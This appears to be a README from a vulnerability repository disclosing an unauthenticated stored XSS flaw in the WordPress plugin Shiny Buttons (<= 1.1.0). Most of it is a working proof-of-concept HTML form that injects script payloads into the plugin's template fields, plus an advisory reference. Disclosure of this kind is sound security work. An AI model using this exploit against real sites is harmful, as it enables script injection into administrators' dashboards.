| .. | |||
| README.md | Loading last commit info... | ||
README.md
Shiny Buttons <= 1.1.0 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not have any authorisation and CSRF in place when saving a template (wpbtn_save_template function hooked to the init action), nor sanitise and escape them before outputting them in the admin dashboard, which allow unauthenticated users to add a malicious template and lead to Stored Cross-Site Scripting issues.
Proof of Concept
<html>
<body>
<form action="https://example.com/" method="POST">
<input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" />
<input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" />
<input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" />
<input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" />
<input type="hidden" name="wpbtn_tpl[font]" value="Michroma" />
<input type="hidden" name="wpbtn_tpl[font_size]" value="12" />
<input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" />
<input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" />
<input type="hidden" name="wpbtn_tpl[radius]" value="0" />
<input type="hidden" name="wpbtn_tpl[width]" value="0" />
<input type="hidden" name="do" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
References
https://wpscan.com/vulnerability/29514d8e-9d1c-4fb6-b378-f6b7374989ca